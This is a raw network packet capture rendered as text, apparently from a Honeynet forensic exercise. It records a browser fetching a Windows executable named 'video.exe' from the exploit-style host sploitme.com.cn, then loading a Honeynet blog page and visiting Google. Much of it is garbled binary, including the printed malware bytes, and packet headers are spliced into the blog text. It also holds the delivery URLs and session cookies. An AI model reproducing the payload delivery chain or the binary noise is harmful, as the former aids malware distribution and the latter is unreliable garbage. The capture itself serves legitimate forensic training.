http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive F;=K66' RT5E(@t84 P9 T3 PJF;=K' RT5E@o84 P9 T3 PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:44 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEF;=K ' RT5E#@o84 P9 T3 P.t&uV҉UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBF;=KU ' RT5E$@o84 P9 4T3 PFMu4$MԋUA IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@F;=K$<<RT5' E('@ 849PT3 size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@F;=K*%' RT5E&@o 84 P9 T3 PgAB D4@"AB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsignalsprintfstrF;=K\%' RT5E'@pc84 P9 DT3 PlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.orgF;=K&<<RT5' E((@ 849PT3 P9 F;=K'<<RT5' E()@ 849PT3 P-F;=K,<<RT5' E(*@ 849PT3 DP-F;=K0<<RT5' E(+@ 849PT3 P F;=KHlJJRT5' E<,@ 849PT3 PΥGET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive F;=Km66' RT5E((@t84 P9 T44PF;=KV' RT5E)@o84 P9 T44PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:44 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEF;=K' RT5E-@o84 P9 ?T44Pt&uV҉UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBF;=K<<RT5' E(.@ 849PT44 PF;=Kn' RT5E.@o84 P9 T44PFMu4$MԋUA IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@F;=K' RT5E/@o84 P9 &T44P%a@%Da@%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@F;=K' RT5E0@o84 P9 ,CT44PAB D4@"AB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsigF;=K' RT5E1@pA84 P9 1T44P+nalsprintfstrlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.orgF;=K<<<RT5' E(/@ 849PT44 ?PEF;=K^<<RT5' E(0@ 849PT44 &PF;=K<<RT5' E(1@ 849PT44 1PF;=K!<<RT5' E(2@ 849PT44 6RPDF;=Knn' E`3M  Lm_2( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   F;=KOnn' E`4L  L]3( FHEPFCELEHFCEPFFFACACACACACACABO   G;=K6' E5  x4  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462G;=KB' E6  J5  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462UH;=KLLRT5' E>?i 5*匥wwwhoneynetorgH;=K) ' EB  x7  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462I;=KLLRT5' E>Ci 5*匥wwwhoneynetorgI;=KS\\' RT5EN2@ 5:3wwwhoneynetorg @rI;=K&j>>RT5' E0D@8 @r=Pp>GI;=K::' RT5E,3@@r P=`I;=K<<RT5' E(F@8 @r=PPI;=KRT5' EG@6 @r=PP GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.honeynet.org Connection: Keep-Alive Cookie: SESS0f916077214db25d3c25b38417a57722=c3c14637ee4fa2f3ced7dfe9b7f77eb9; __utma=121888786.1305690527.1264085162.1265128880.1265128952.4; __utmz=121888786.1264085162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) I;=K66' RT5E(4@@r P=qP,I;=K ' RT5E5@@r P=qPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:48 GMT Server: Apache X-Powered-By: PHP/4.3.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 02 Feb 2010 19:05:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 6c34 Honeynet Project Blog | The Honeynet Project
To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

Honeynet Project Blog

First challenge of the Forensic Challenge 2010 has been posted.

Main blog - Mon, 01/18/2010 - 07:21
We have just posted the first challenge of the Forensic Challenge 2010. The first challenge deals with a network attack. It has been provided by Tillmann Werner from the Giraffe Chapter. It is accessible at https://honeynet.org/node/504. Submissions are due on Monday, February 1st 2010 and results will be released on Monday, February 15th 2010. The top three submissions will be awarded with small prizes. Check it out!

Challenge 1 of the Forensic Challenge 2010 - pcap attack trace

Main blog - Mon, 01/18/2010 - 06:18
Forensic Challenge 2010 Challenge 1 - pcap attack trace - (provided by Tillmann Werner from the Giraffe Chapter) is to investigate a network attack.

Send submissions (please use the MS word submission template or the Open Office submission template) forensicchallenge2010@honeynet.org no later then 17:00 EST, Monday, February 1st 2010. Results will be released on Monday, February 15th 2010. Small prizes will be awarded to the top three submissions.


Skill Level: Intermediate

The Challenge:

A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

  1. Which systems (i.e. IP addresses) are involved? (2pts)
  2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
  3. How many TCP sessions are contained in theJ;=K]' RT5E:@@r P="qP| dump file? (2pts)
  4. How long did it take to perform the attack? (2pts)
  5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
  6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
  7. What specific vulnerability was attacked? (2pts)
  8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
  9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
  10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
  11. Do you think this is a manual or an automated attack? Why? (2pts)
Download:
attack-trace.pcap_.gz Sha1: 0f5ddab19034b2656ec316875b527d9bff1f035f

Announcing the Honeynet Project Forensic Challenge 2010

Main blog - Tue, 01/12/2010 - 17:34

I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members.


It has been several years since we provided Forensic Challenges and with the Forensic Challenge 2010, we will provide desperately needed upgrades. The Forensic Challenge 2010 will include a mixture of server-side attacks on the latest operating systems and services, attacks on client-side attacks that emerged in the past few years, attacks on VoiP systems, web applications, etc. At the end of challenge, we will provide a sample solution created by our members using the state-of-the-art tools that are publicly available, such as libemu and dionaea.


The first challenge (of sJ;=K' RT5E<@@r P=bqPWeveral for 2010) will be posted on our Forensic Challenges web site on Monday, January 18th 2010. We will be open to submissions for about two weeks and announce the winners by February 15th 2010. This year, we will also award the top three submissions with prizes! Please check the web site on Monday, January 18th 2010 for further details...



Christian Seifert

Chief Communications Officer
The Honeynet Project

Italian Chapter updates

Main blog - Wed, 12/16/2009 - 09:41
Folks, I would like to inform you all about our recent activities that we are attempting to achieve. First of all, we have totally rebuilt our web site. This new ones aim to be a central repository of all the (external/internal) news concerning botnets (mainly) and malwares (secondary). We will use the blog for posting abouJ;=K <<RT5' E(M@8 @r=PqP;J;=K^' RT5E=@@r P=qPt our project developments, and for commenting/reporting interesting news concerning the field that we are currently treating, so you can now add a new entry to your feeds reader :)

VOIP phoneynet : PART 3 "WHAT WOULD CROOKS DO WITH A COMPROMISED VOIP GATEWAY ANYWAY?"

Australian Blog - Sat, 12/05/2009 - 13:55

There are quite a few ways that a criminal can make use of a compromised VOIP server. Its important to realize that the criminal mind is very imaginative, and there will be many motives and scams that we have not even imagined yet, much less experienced.
When looking at these types of questions, I think it helps to have the notion of motive in the back of your mind. This may sound obvious, but I find this helps answer the question 'what would a person or group with this motivation want with a compromised VOIP system?'.

Here are someJ;=K ' RT5E>@@r P=qPw potential motives. While I won't go into every possible scenario, it's really not hard to imagine that the full control of target's phone system would be handy for people with any of these motives.

  • Financial gain
  • Political
  • Religious
  • Reputation and ego of the hacker
  • Intellectual Property theft, Trade Secrets
  • Espionage
  • Retribution, commercial or personal
  • Vandalist, miscreant activity (bored youth..)
  • I got some great local and international feedback on incidents from readers of Part 1 and Part 2 of this blog series (Thank you everyone). Most of these incidents seem to fall into the 'Financial gain' motive group, so I'll give two examples of a common attacks which are currently seen in AU and overseas, and a possible future threat.

    Cheap overseas calls / calling cards.
    One of the most common uses for hacked VOIP servers is to simply make unauthorized calls, and there have been incidents of hacked VOIP servers being used in relation to calling card scams to do just this. This is not to say that all cheap calling cards operations are scams, most I'm sure are legitimate.
    Here is a brief overview of a simple version of the scam:

  • The crook controls a hacked VOIP system in (say) Australia. This J;=K|<<RT5' E(O@8 @r=PqBP DIEGEJ;=K' EP  x8  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462J;=K' RT5E?@@r P=BqPjmeans that they can accept and redirect calls, and essentially control every aspect of that phone system.
  • The crook sells 'calling cards' to citizens of another country that live in, or are visiting Australia. The card allows them to call home at ridiculously cheap rates, a tiny fraction of the cost of a legitimate overseas call.
  • The buyer of the calling card is instructed to call a local (probably legitimate) number in Australia and then enter in the international number they are trying to reach. The crook then reroutes these calls through VOIP to the hacked system, which then makes the international call. This functionality could potentially be turned off periodically to evade being uncovered, and could even be configured to only use the hacked VOIP server for calls to a specific set of countries.
  • The buyer of the calling card of course could not be aware that the call was routed through a hacked VOIP system, they are just happy to have spoken to family and friends at a cheap rate.
  • Note also that it is entirely possible for the calls to be re-routed through an entire chain of hacked VOIP servers in more 2 or 3 different countries, effectively 'laundering the call' by making it harder to track down if an investigation is ever launched. Jurisdictional/timezone/culture and language differences are some of the most challenging hurdles faced by cybercrime investigators, and theJ;=K' RT5E@@@r P=⧗qP crooks know how to take advantage of this (I aim to explore these aspects in a later instalment of this blog series)
  • The important thing is that the calling card holder just got an overseas call for the cost of a local call, plus the crooks margin, so they are not really the victim. The owner of the hacked VOIP server however may (or may not depending the size of a normal bill) realize that something is amiss when they get their next phone bill, as it was their system that made the calls. We have heard a few stories of this occurring (in Australia and abroad), where the victim's telephone bill inexplicably sky-rocketed by over $20,000 in one case here in Australia!

    Premium rate number calling
    This attack predates VOIP by many years, first being used on standard corporate PABX systems. VOIP has made this much more lucrative for the crooks due to the call volumes it allows.

    The scam is fairly simple.

  • Crook has control of hacked VOIP system(s) for which the victim gets bills for on a monthly basis. This VOIP system may belong to a corporate entity, and so may be capable of making many concurrent calls.
  • The crook has a premium rate 1900 number, for which they collect revenue on a weekly or daily basis.
  • Crook gets the hacked VOIP system to make multiple, repeated calls to the 1900 number, thus adding to the account of the 1900 number, at the expeJ;=KK<<RT5' E(Q@8 @r=Pq˂P DIEGEJ;=K' RT5EA@@r P=˂qPnse of the owner of the hacked VOIP system.
  • Crook collects the revenue from the 1900 number every day/week until someone notices.
  • In this case, the victim may not realise they have been hacked until they receive the bill at the end of the month, by which time the crook has made off with potentially hundreds of thousands of dollars over at least 2 weekly collection periods.
    Note also that there is a money trail here, so the crook must also engage in other crime types such as identity theft, money laundering etc to actually get cash out.

    Future threat – Denial of Service
    The motive behind this attack could probably be any of the ones listed above.
    I've not heard of any instances of this, but it's worthwhile considering how we would deal with the threat of Denial of Service on Voice systems. This could be as simple as an attacker using a hacked VOIP system to dial multiple concurrent calls into a target's phone numbers (VOIP, or PSTN for that matter) which would exhaust all of the available connections, even ISDN/PSTN indials??. Remember that SIP, the predominant VOIP protocol is UDP (connectionless) and being an Internet protocol could be emulated/faked, so perhaps a hacked VOIP system wouldn't even be required to effect a DOS.
    This area needs much more research and consideration from authorities much better funded and capable than us, and yes J;=K>' RT5EB@@r P="qP%we are more than happy to brainstorm ideas on threat scenarios and mitigations with the appropriate agencies/researchers, just contact us.

    Given the importance of voice systems both for commerce and its use in emergency situations, it's imperative that threat scenarios are identified and risks are mitigated to within acceptable tolerances. I hope this blog gives some background info to organizations who are starting to consider the threats they face, and put in place appropriate controls and response plans.

    Next in the blog series is PART 4 "HOW BEST TO PROTECT AGAINST VOIP THREATS". Feel free to contact me at ben@honeynet.org.au with any feedback, or input into the next one.

    Nepenthes Pharm

    Main blog - Sun, 11/29/2009 - 18:32
    Parvinder Bhasin asked us to post an announcement about his new tool. While not officially a tool developed by the Honeynet Project, we thought you should know about some of the great work he is doing. NJ;=KC<<RT5' E(R@8 @r=PqP{ DIEGEJ;=KR' RT5EC@@r P=§qP5epenthes PHARM is a perfect companion to your Nepenthes honeypot installations. PHARM is an Open Source client/server and web portal package, which provides central reporting and analysis of your distributed Nepenthes based honeypots.

    Know Your Tools: use Picviz to find attacks

    Main blog - Thu, 11/26/2009 - 17:27
    We are very excited to announce the publication of our first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

    The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

    Paper Abstract
    Picviz is a parallel coordinates plotter which enables easy scripting from various input (tcpdump, syslog, iptables logs, apache logs, etc..) to visualize data and discover interesting aspects of that data quickly. Picviz uncovers previously hidden data that is J;=K' RT5ED@@r P=bqPdifficult to identify with traditional analysis methods.

    In the first paper of our new Know Your Tools series, Sebastien Tricaud from the French Honeynet Project Chapter and Victor Amaducci from the University of Campinas, focus on Picviz. After a brief overview on parallel coordinates, Picviz architecture, and installation procedure, three real-world examples are presented that illustrate how to identify attacks from large amounts of data: Picviz is used to analyze SSH logs, Apache access logs and network traffic. With these examples, it is demonstrated how Picviz can find attacks that previously have been hidden.


    Recent additions to Picviz GUI have been made by Victor Amaducci under the mentorship of Sebastien Tricaud as part of the Google Summer of Code program 2009. The most recent version of Picviz is freely available for download from its project site at http://www.wallinfire.net/picviz and support can be sought from the Picviz mailing list at http://www.wallinfire.net/cgi-bin/mailman/listinfo/picviz..

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:49

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:34

    RE-Google Architecture

    Main blog - Sun, 11/15/2009 - 22:31

    RE-Google - or how Grandma started Reverse Engineering

    Main blog - Sun, 11/15/2009 - 22:20
    Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

    Glastopf

    Main blog - Sat, 10/17/2009 - 19:19
    Web sites are hacked all the time. Web application, database, and cross-site scripting vulnerabilJ;=Kv!<<RT5' E(V@8~ @r=PqBP{ FHEPFJ;=Kh' RT5EG@@r P=BqPities expose a large attack surface that can be exploited to, among others, deface the web site, send spam, convert web site into bots, and serve drive-by-download attacks. Glastopf is a low-interaction honeypot that emulates a vulnerable web server hosting many web pages and web applications with thousands of vulnerabilities. Glastopf is easy to setup and once indexed by search engines, attacks will pour in by the thousands daily. Glastopf has been developed as part of the 2009 Google of Summer Code by student Lukas Rist (and mentored by Thorsten Holz of the German Honeynet Project Chapter). It can be downloaded from the Glastopf trac site at http://trac.glastopf.org/trac. More information on Glastopf can be found on the project site at http://glastopf.org/.
    Syndicate content
    0 J;=K}66' RT5E(I@@r P=qPnJ;=K݁<<RT5' E(W@8} @r=PqPs FHEPFJ;=K<<RT5' E(X@8| @r=PqPs DIEGEJ;=K<<RT5' E(Y@8{ @r=PqPs FHEPFJ;=Kp66' RT5E(J@@r P=rPnJ;=Kt TTRT5' EFZi 52ujwwwgoogle-analyticscomJ;=KR ' RT5EK@H 5Nwwwgoogle-analyticscom  2 www-google-analyticslgoogle!6J}Me6J}Md6J}MfJ;=K>>RT5' E0[@S| J}Me>PrRp0J;=Kw;::' RT5E,L@ՏJ}Me P>vrR`J;=K@<<RT5' E(]@S J}Me>PrRvPK;=K RT5' E^@P J}Me>PrRvPZWGET /__utm.gif?utmwv=4.6.5&utmn=1731245256&utmhn=www.honeynet.org&utmcs=utf-8&utmsr=1088x729&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=6.0%20r79&utmdt=Honeynet%20Project%20Blog%20%7C%20The%20Honeynet%20Project&utmhid=2130591288&utmr=-&utmp=%2F&utmac=UA-372404-7&utmcc=__utma%3D121888786.1305690527.1264085162.1265128952.1265310286.5%3B%2B__utmz%3D121888786.1264085162.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B HTTP/1.1 Accept: */* Referer: http://www.honeynet.org/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google-analytics.com Connection: Keep-Alive K;=K 66' RT5E(M@ՒJ}Me P>vrUPK;=KIpp' RT5EbN@WJ}Me P>vrUPrHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:06 GMT Content-Length: 35 Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:43 GMT Last-Modified: Wed, 21 Jan 2004 19:50:30 GMT Content-Type: image/gif Server: Golfe Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate X-XSS-Protection: 0 K;=K>IYY' RT5EKO@mJ}Me P>wPrUw_P.K;=KW ' Ea  x9  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462M;=K' Eb  ):  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462N;=K8' Ec  );  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462N;=K(>>RT5' E0d@8h @r?Pp?.O;=K::' RT5E,P@@r P?F`O;=K' Ef  )<  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462P;=Ku' Eg  )=  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462Q;=Krnn' E`h  LWS>) FHEPFCELEHFCEPFFFACACACACACACABN   R;=KMnn' E`i  LWS>) FHEPFCELEHFCEPFFFACACACACACACABN   R;=K nn' E`j  LWS>) FHEPFCELEHFCEPFFFACACACACACACABN   S;=Knn' E`k  LXS>( FHEPFCELEHFCEPFFFACACACACACACABN   S;=K66' RT5E(Q@t82 P: OyQaP*S;=Kߪ<<RT5' E(l@z 82:PyQa PPS;=K66' RT5E(R@t82 P8 ˎa3|PS;=K<<RT5' E(m@y 828Pa3| P~ 1GET /fT;=Ks1nn' E`n  LO?) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   U;=K#nnn' E`o  LO?) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   U;=K66' RT5E(S@t84 P9 6RT44P!U;=K<<RT5' E(p@t 849PT44 6SPC DIEGEU;=K<<RT5' E(q@s 849PT44 6SP FHEPFU;=K><<RT5' E(r@t 82:PyQa PP&U;=K`<<RT5' E(s@s 828Pa3| PU;=K nn' E`t  LO?) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   V;=K*}JJRT5' E<ui 5((\uwwwgooglecomV;=K͆' RT5ET@' 5=1uwwwgooglecom Zwwwlgooglecom,TUj,TUi,TU,TUg,TUh,TUcV;=Kԫ>>RT5' E0v@6 Uj@PpwV;=K::' RT5E,U@Uj P@)`PV;=KE<<RT5' E(x@6 Uj@P)P DIEGEV;=KAART5' E3y@4} Uj@P)P(GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google.com Connection: Keep-Alive Cookie: PREF=ID=e2d48468f4ba6ce0:U=5da8c791fa19cf9b:TM=1264084848:LM=1264769133:S=8DOC33xwBrhLOdd9; NID=31=gYIZZKrPrEnQ1GYhiB-CQkP4PXCYoqG-A6R1xD8Xx7pYFlkBnr7DS6ygKCv2RSHIEenNnTMs0jtMSkOKV35Ntc0AqBPNzW7UIQ1F7Tx7KV7PBe--KezKMunqahAaUKqV V;=Kή66' RT5E(V@Uj P@)PV;=K' RT5EW@Uj P@)PHTTP/1.1 302 Found Location: http://www.google.fr/ Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Tue, 02 Feb 2010 19:06:00 GMT Server: gws Content-Length: 218 X-XSS-Protection: 0 302 Moved

    302 Moved

    The document has moved here. V;=KsIIRT5' E;{i 5'%^wwwgooglefrV;=KQ' RT5EX@ 5I=ਁwwwgooglefr 'wwwgooglecom+ZwwwlgooglecomGTUcGTUjGTUiGTUGTUgGTUhV;=K >>RT5' E0|@6 UcAPvpbV;=K::' RT5E,Y@Uc PA*v`V;=K<<RT5' E(~@6 UcAPv*PV;=Kc@@RT5' E2@4 UcAPv*PhGET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cookie: PREF=ID=e2e4041cfce38490:U=d268ee4913870d14:TM=1264084848:LM=1264769134:S=idyeS_ZtlvevQq-B; NID=31=jTf84Bsx_VBZ3zZESENLEMM0EN5d01u_AF2pZK0EIKTFpo4RLNSPmrGdelxrx6WlfXI0OdM0UwqYMdwIS7T4AXzWq7dXkxmQjKFPsc8VCV9JwME0Xzblz3XlEbYWwfzn Connection: Keep-Alive Host: www.google.fr V;=K66' RT5E(Z@Uc PA*vPV;=KG<<RT5' E(@6 Uj@P)PCV;=K4h' RT5E[@#Uc PA*vPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:00 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Server: gws Content-Length: 4585 X-XSS-Protection: 0 ZVۺߧp/5)PZZ.@ӝ!۲-ҌgX/d;q 0Zۺ}7M)eYlcc˟ݽ3,Ổ 